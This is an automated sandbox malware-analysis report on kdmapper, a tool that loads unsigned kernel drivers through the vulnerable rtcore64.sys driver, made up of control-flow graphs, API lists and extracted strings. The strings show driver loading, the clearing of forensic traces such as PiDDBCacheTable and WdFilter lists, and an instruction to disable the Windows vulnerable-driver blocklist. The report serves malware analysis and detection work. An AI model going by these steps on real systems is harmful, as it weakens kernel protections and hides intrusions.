                                                                                          control_flow_graph 0 7ff7cc4145e0-7ff7cc41466d LoadLibraryA * 2 _dupenv_s 1 7ff7cc414670-7ff7cc414677 0->1 1->1 2 7ff7cc414679-7ff7cc4146c2 call 7ff7cc41c9f0 call 7ff7cc41a0f0 1->2 7 7ff7cc4146f9-7ff7cc41478e free call 7ff7cc41c9f0 call 7ff7cc419af0 call 7ff7cc413bb0 call 7ff7cc413ce0 2->7 8 7ff7cc4146c4-7ff7cc4146d6 2->8 21 7ff7cc41479c-7ff7cc414826 call 7ff7cc41c9f0 SymFromName 7->21 22 7ff7cc414790-7ff7cc414797 7->22 10 7ff7cc4146d8-7ff7cc4146eb 8->10 11 7ff7cc4146f4 call 7ff7cc423fe0 8->11 10->11 13 7ff7cc4146ed-7ff7cc4146f3 _invalid_parameter_noinfo_noreturn 10->13 11->7 13->11 28 7ff7cc414828-7ff7cc41482c 21->28 29 7ff7cc41485e-7ff7cc41486e 21->29 23 7ff7cc4148b1-7ff7cc4148cd call 7ff7cc41a3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 22->23 32 7ff7cc414ed2-7ff7cc414ed6 23->32 33 7ff7cc4148aa 28->33 34 7ff7cc41482e-7ff7cc414840 28->34 30 7ff7cc414870-7ff7cc414882 29->30 31 7ff7cc4148a5-7ff7cc4148a8 29->31 37 7ff7cc4148a0 call 7ff7cc423fe0 30->37 38 7ff7cc414884-7ff7cc414897 30->38 31->33 39 7ff7cc4148d2-7ff7cc414951 _time64 GetCurrentThreadId srand rand 31->39 35 7ff7cc414ed8-7ff7cc414eff SymUnloadModule64 SymCleanup CloseHandle * 2 32->35 36 7ff7cc414f05-7ff7cc414f0d 32->36 33->23 40 7ff7cc414857-7ff7cc41485c call 7ff7cc423fe0 34->40 41 7ff7cc414842-7ff7cc414855 34->41 35->36 44 7ff7cc414f3c-7ff7cc414f54 36->44 45 7ff7cc414f0f-7ff7cc414f20 36->45 37->31 38->37 42 7ff7cc414899-7ff7cc41489f _invalid_parameter_noinfo_noreturn 38->42 47 7ff7cc41499d-7ff7cc4149c7 call 7ff7cc41a3c0 call 7ff7cc4140c0 39->47 48 7ff7cc414953-7ff7cc41495d 39->48 40->33 41->40 41->42 42->37 54 7ff7cc414f8a-7ff7cc414fa3 44->54 55 7ff7cc414f56-7ff7cc414f67 44->55 52 7ff7cc414f37 call 7ff7cc423fe0 45->52 53 7ff7cc414f22-7ff7cc414f35 45->53 73 7ff7cc4149c9 47->73 74 7ff7cc4149cc-7ff7cc4149f1 call 7ff7cc41d590 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 47->74 49 7ff7cc414967-7ff7cc414998 rand 48->49 49->49 58 7ff7cc41499a 49->58 52->44 53->52 60 7ff7cc414f7e-7ff7cc414f84 _invalid_parameter_noinfo_noreturn 53->60 56 7ff7cc414fd9-7ff7cc41500b call 7ff7cc423fc0 54->56 57 7ff7cc414fa5-7ff7cc414fb6 54->57 62 7ff7cc414f69-7ff7cc414f7c 55->62 63 7ff7cc414f85 call 7ff7cc423fe0 55->63 64 7ff7cc414fb8-7ff7cc414fcb 57->64 65 7ff7cc414fd4 call 7ff7cc423fe0 57->65 58->47 60->63 62->60 62->63 63->54 64->65 69 7ff7cc414fcd-7ff7cc414fd3 _invalid_parameter_noinfo_noreturn 64->69 65->56 69->65 73->74 77 7ff7cc414a2d-7ff7cc414a3c call 7ff7cc4142e0 74->77 78 7ff7cc4149f3-7ff7cc414a0a 74->78 85 7ff7cc414a3e 77->85 86 7ff7cc414a66-7ff7cc414adc _wremove memset call 7ff7cc4189c0 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z ??7ios_base@std@@QEBA_NXZ 77->86 80 7ff7cc414a28 call 7ff7cc423fe0 78->80 81 7ff7cc414a0c-7ff7cc414a1f 78->81 80->77 81->80 83 7ff7cc414a21-7ff7cc414a27 _invalid_parameter_noinfo_noreturn 81->83 83->80 87 7ff7cc414a45-7ff7cc414a61 call 7ff7cc41a3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 85->87 92 7ff7cc414ade-7ff7cc414ae6 call 7ff7cc419ef0 86->92 93 7ff7cc414b23-7ff7cc414b2b call 7ff7cc419ef0 86->93 95 7ff7cc414e7e-7ff7cc414e86 87->95 105 7ff7cc414ae8-7ff7cc414b0a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 92->105 106 7ff7cc414b0b-7ff7cc414b1e call 7ff7cc414000 92->106 101 7ff7cc414b2d-7ff7cc414b4f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 93->101 102 7ff7cc414b50-7ff7cc414b67 call 7ff7cc414000 call 7ff7cc422900 93->102 98 7ff7cc414e88-7ff7cc414e9e 95->98 99 7ff7cc414ec1-7ff7cc414ecd 95->99 103 7ff7cc414ebc call 7ff7cc423fe0 98->103 104 7ff7cc414ea0-7ff7cc414eb3 98->104 99->32 101->102 115 7ff7cc414b69-7ff7cc414ba0 call 7ff7cc41a3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z _wremove 102->115 116 7ff7cc414ba5-7ff7cc414bdd CreateFileW 102->116 103->99 104->103 109 7ff7cc414eb5-7ff7cc414ebb _invalid_parameter_noinfo_noreturn 104->109 105->106 106->87 109->103 115->95 118 7ff7cc414beb-7ff7cc414c2e call 7ff7cc41c9f0 call 7ff7cc4232c0 116->118 119 7ff7cc414bdf-7ff7cc414be6 116->119 129 7ff7cc414c6c-7ff7cc414c6f 118->129 130 7ff7cc414c30-7ff7cc414c42 118->130 122 7ff7cc414e59-7ff7cc414e60 call 7ff7cc41a3c0 119->122 126 7ff7cc414e65-7ff7cc414e6f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 122->126 128 7ff7cc414e75-7ff7cc414e7d call 7ff7cc415a80 126->128 128->95 135 7ff7cc414c7d-7ff7cc414cbc call 7ff7cc41c9f0 call 7ff7cc4232c0 129->135 136 7ff7cc414c71-7ff7cc414c78 129->136 132 7ff7cc414c60-7ff7cc414c65 call 7ff7cc423fe0 130->132 133 7ff7cc414c44-7ff7cc414c57 130->133 132->129 133->132 137 7ff7cc414c59-7ff7cc414c5f _invalid_parameter_noinfo_noreturn 133->137 144 7ff7cc414cbe-7ff7cc414cd0 135->144 145 7ff7cc414cf3-7ff7cc414cf6 135->145 136->122 137->132 146 7ff7cc414cee call 7ff7cc423fe0 144->146 147 7ff7cc414cd2-7ff7cc414ce5 144->147 148 7ff7cc414cf8-7ff7cc414d0b call 7ff7cc41a7c0 145->148 149 7ff7cc414d10-7ff7cc414d3a call 7ff7cc417b00 145->149 146->145 147->146 150 7ff7cc414ce7-7ff7cc414ced _invalid_parameter_noinfo_noreturn 147->150 148->128 156 7ff7cc414d40-7ff7cc414d55 149->156 157 7ff7cc414e52 149->157 150->146 158 7ff7cc414d60-7ff7cc414dc3 DeviceIoControl 156->158 157->122 158->157 159 7ff7cc414dc9-7ff7cc414dd6 158->159 159->158 160 7ff7cc414dd8-7ff7cc414ded 159->160 161 7ff7cc414e4d-7ff7cc414e50 160->161 162 7ff7cc414def-7ff7cc414df6 call 7ff7cc4172b0 160->162 161->95 165 7ff7cc414df8-7ff7cc414dff 162->165 166 7ff7cc414e01-7ff7cc414e0b call 7ff7cc417ea0 162->166 165->122 169 7ff7cc414e0d-7ff7cc414e14 166->169 170 7ff7cc414e16-7ff7cc414e24 call 7ff7cc416810 166->170 169->122 173 7ff7cc414e2f-7ff7cc414e36 call 7ff7cc415010 170->173 174 7ff7cc414e26-7ff7cc414e2d 170->174 173->161 177 7ff7cc414e38-7ff7cc414e4b call 7ff7cc41a7c0 173->177 174->122 177->126
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@_invalid_parameter_noinfo_noreturn$??6?$basic_ostream@V01@@$Virtual$?setstate@?$basic_ios@CloseFreeHandleInformationLibraryLoadQuerySystem_wremovememmoverand$??7ios_base@std@@?write@?$basic_ostream@AllocCleanupControlCreateCurrentDeviceFileFromModule64NameThreadUnloadV12@_dupenv_s_time64freememsetsrand
                                                                                          • String ID: 0$NtUserSetGestureConfig$[!] Failed to ClearMmUnloadedDrivers$[!] Failed to ClearWdFilterDriverList$[-] Can't find TEMP folder$[-] Failed to ClearKernelHashBucketList$[-] Failed to ClearPiDDBCacheTable$[-] Failed to Load PDB$[-] Failed to Load Symbol of NtUserSetGestureConfig$[-] Failed to create vulnerable driver file$[-] Failed to get ntoskrnl.exe$[-] Failed to get temp path$[-] Failed to load driver rtcore64.sys$[-] Failed to register and start service for the vulnerable driver$[-] NtUserSetGestureConfig not found$[-] win32k.sys not found$[<] Loading vulnerable driver, Name: $\System32\win32k.sys$\\.\RTCore64$gfff$https://msdl.microsoft.com/download/symbols$nULoYBmSWb$ntoskrnl.exe$systemroot$user32.dll$win32k.sys$win32u.dll$xxx
                                                                                          • API String ID: 4261666574-3734435960
                                                                                          • Opcode ID: bce5c08c5481cec9c782fb4ba2241304df26073b218856d8ec388f28b70f6ba3
                                                                                          • Instruction ID: 0e9c034be297c01c8b12e6b2cc433da1901d173cfe0582f06626fc18aabc6538
                                                                                          • Opcode Fuzzy Hash: bce5c08c5481cec9c782fb4ba2241304df26073b218856d8ec388f28b70f6ba3
                                                                                          • Instruction Fuzzy Hash: 71529562E187C285EA10EF24E8413BDAB61FF857BCF909231D99D46A95DF7CE284C310
                                                                                          Function 00007FF7CC421630 Relevance: 84.7, APIs: 28, Strings: 20, Instructions: 749COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7CC421673
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC4216CB
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42170B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42179B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC4217DB
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42184B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42188B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42190B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42194B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219A4
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219CC
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219F3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421A1B
                                                                                            • Part of subcall function 00007FF7CC421390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC421406
                                                                                            • Part of subcall function 00007FF7CC421390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42143D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421A42
                                                                                          • memcmp.VCRUNTIME140(?), ref: 00007FF7CC421C18
                                                                                          • __std_fs_code_page.MSVCPRT ref: 00007FF7CC421BCC
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421D58
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC421D7B
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DB3
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DBA
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DC1
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421F17
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421F7A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4220A0
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC422168
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC422190
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4221C4
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC42220B
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                            • Part of subcall function 00007FF7CC423080: memset.VCRUNTIME140 ref: 00007FF7CC4230C1
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4230E0
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4230FF
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC423133
                                                                                            • Part of subcall function 00007FF7CC423080: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC423152
                                                                                            • Part of subcall function 00007FF7CC423080: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42319B
                                                                                            • Part of subcall function 00007FF7CC423080: ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC4231D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@@$_wcsicmp$_invalid_parameter_noinfo_noreturn$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@D@std@@@1@_ExceptionFilterInit@?$basic_streambuf@Osfx@?$basic_ostream@_UnhandledV12@V?$basic_streambuf@__std_fs_code_pagemallocmemcmpmemset
                                                                                          • String ID: [!] Incorrect Usage!$ doesn't exist$.sys$PassAllocationPtr$[+] Allocate Independent Pages mode enabled$[+] Clean Valnerable Driver enabled$[+] Free pool memory after usage enabled$[+] Mdl memory usage enabled$[+] Pass Allocation Ptr as first param enabled$[+] Usage: kdmapper.exe [--free][--mdl][--PassAllocationPtr] driver$[+] success$[-] Failed to map $[-] Failed to read image to memory$[-] File $[-] Too many allocation modes$[-] Warning failed to fully unload vulnerable driver $clean$free$indPages$mdl
                                                                                          • API String ID: 3202131322-1332891958
                                                                                          • Opcode ID: 16d2ccc80ab2a97235b05bf546b41234f32b28a7870f0edaabc0c6fcd086e44e
                                                                                          • Instruction ID: ddb21f35e806f7d6fbbccd7d676489561ff589e0d05390dcbaae590faf7f9f32
                                                                                          • Opcode Fuzzy Hash: 16d2ccc80ab2a97235b05bf546b41234f32b28a7870f0edaabc0c6fcd086e44e
                                                                                          • Instruction Fuzzy Hash: DF728662E186C285EB10AF25D8422B8AB61FF457B8FD0D231D95D836D5DF7CEA84C360
                                                                                          Function 00007FF7CC422900 Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 278registrylibraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 440 7ff7cc422900-7ff7cc422950 call 7ff7cc4140c0 443 7ff7cc422dad-7ff7cc422db2 call 7ff7cc411230 440->443 444 7ff7cc422956-7ff7cc422996 call 7ff7cc41d270 440->444 450 7ff7cc422db3-7ff7cc422db8 call 7ff7cc411230 443->450 449 7ff7cc42299c-7ff7cc4229a1 444->449 444->450 451 7ff7cc4229a3 449->451 452 7ff7cc4229a6-7ff7cc4229eb call 7ff7cc41d270 RegCreateKeyW 449->452 451->452 457 7ff7cc4229ed-7ff7cc4229f4 452->457 458 7ff7cc4229f6-7ff7cc422a31 RegSetKeyValueW 452->458 459 7ff7cc422a40-7ff7cc422a56 call 7ff7cc41a7c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 457->459 460 7ff7cc422aa8-7ff7cc422ad7 RegSetKeyValueW 458->460 461 7ff7cc422a33-7ff7cc422a39 RegCloseKey 458->461 466 7ff7cc422a5c 459->466 462 7ff7cc422ad9-7ff7cc422ae6 RegCloseKey 460->462 463 7ff7cc422aeb-7ff7cc422b04 RegCloseKey GetModuleHandleA 460->463 461->459 462->459 465 7ff7cc422b0a-7ff7cc422b41 GetProcAddress * 2 RtlAdjustPrivilege 463->465 463->466 468 7ff7cc422b4f-7ff7cc422b5a 465->468 469 7ff7cc422b43-7ff7cc422b4a 465->469 470 7ff7cc422a5e-7ff7cc422a66 466->470 471 7ff7cc422da7-7ff7cc422dac call 7ff7cc411230 468->471 472 7ff7cc422b60-7ff7cc422bf6 call 7ff7cc41d270 RtlInitUnicodeString NtLoadDriver call 7ff7cc41a7c0 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 468->472 469->459 473 7ff7cc422a6c-7ff7cc422a82 470->473 474 7ff7cc422cd6-7ff7cc422cf0 470->474 471->443 499 7ff7cc422ca9-7ff7cc422caf 472->499 500 7ff7cc422bfc-7ff7cc422c5f call 7ff7cc41a7c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff7cc41a7c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff7cc41a7c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 472->500 479 7ff7cc422a88-7ff7cc422a9b 473->479 480 7ff7cc422cd1 call 7ff7cc423fe0 473->480 475 7ff7cc422d2b-7ff7cc422d45 474->475 476 7ff7cc422cf2-7ff7cc422d08 474->476 485 7ff7cc422d47-7ff7cc422d5d 475->485 486 7ff7cc422d80-7ff7cc422da6 call 7ff7cc423fc0 475->486 483 7ff7cc422d0a-7ff7cc422d1d 476->483 484 7ff7cc422d26 call 7ff7cc423fe0 476->484 479->480 482 7ff7cc422aa1-7ff7cc422aa7 _invalid_parameter_noinfo_noreturn 479->482 480->474 482->460 483->484 489 7ff7cc422d1f-7ff7cc422d25 _invalid_parameter_noinfo_noreturn 483->489 484->475 491 7ff7cc422d7b call 7ff7cc423fe0 485->491 492 7ff7cc422d5f-7ff7cc422d72 485->492 489->484 491->486 492->491 495 7ff7cc422d74-7ff7cc422d7a _invalid_parameter_noinfo_noreturn 492->495 495->491 501 7ff7cc422cb1-7ff7cc422cb3 499->501 502 7ff7cc422c65-7ff7cc422c68 499->502 500->502 504 7ff7cc422c6b-7ff7cc422c73 501->504 502->504 506 7ff7cc422cba-7ff7cc422ccc 504->506 507 7ff7cc422c75-7ff7cc422c8b 504->507 506->470 510 7ff7cc422c8d-7ff7cc422ca0 507->510 511 7ff7cc422cb5 call 7ff7cc423fe0 507->511 510->511 513 7ff7cc422ca2-7ff7cc422ca8 _invalid_parameter_noinfo_noreturn 510->513 511->506 513->499
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@_invalid_parameter_noinfo_noreturn$Close$??6?$basic_ostream@_AddressProcU?$char_traits@_ValueW@std@@@std@@memmove$AdjustCreateDriverHandleInitLoadModulePrivilegeStringUnicodeV21@@Vios_base@1@
                                                                                          • String ID: 4$Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator.$ImagePath$NtLoadDriver$RtlAdjustPrivilege$SYSTEM\CurrentControlSet\Services\$Type$[+] NtLoadDriver Status 0x$[-] Can't create 'ImagePath' registry value$[-] Can't create 'Type' registry value$[-] Can't create service key$[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config$[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0$[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver$\??\$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                                                          • API String ID: 1880033537-3754729842
                                                                                          • Opcode ID: 1b1214d74ce207aa61321cdcaf86993c4cefdc9976551f91a2d5949959278c17
                                                                                          • Instruction ID: 17c2090d78cc7ceb16119a0ac8c1b7eaa6a380babb7e7968ba5b7ff9f062e6e9
                                                                                          • Opcode Fuzzy Hash: 1b1214d74ce207aa61321cdcaf86993c4cefdc9976551f91a2d5949959278c17
                                                                                          • Instruction Fuzzy Hash: 02D18E62F18A8295EB10EF65E4462ACA771BF487BCF908231D95D536A9DF3CE244C360
                                                                                          Function 00007FF7CC413CE0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 122fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleModuleProcess$AttributesCleanupCurrentDirectoryErrorInitializeLastLoadNameOpenOptionsPathRemoveSpec_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: %02x$.pdb$<$RSDS$d$symbols\
                                                                                          • API String ID: 3470403176-2640848996
                                                                                          • Opcode ID: e7ec6e015cb0f4d723a3c95bc566a1461b5cc8e69fb71ad61825b19786ed76ef
                                                                                          • Instruction ID: 43b6edfe0a3e9156f54619805176c6a1aa8e8d8dfe3df36b4a8df9cf216cd720
                                                                                          • Opcode Fuzzy Hash: e7ec6e015cb0f4d723a3c95bc566a1461b5cc8e69fb71ad61825b19786ed76ef
                                                                                          • Instruction Fuzzy Hash: B7516672608BC181E760DF11F4543AABBA1FB897A8F908135DADD43A99DF3CD584C710
                                                                                          Function 00007FF7CC4214C0 Relevance: 9.0, APIs: 6, Instructions: 50processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
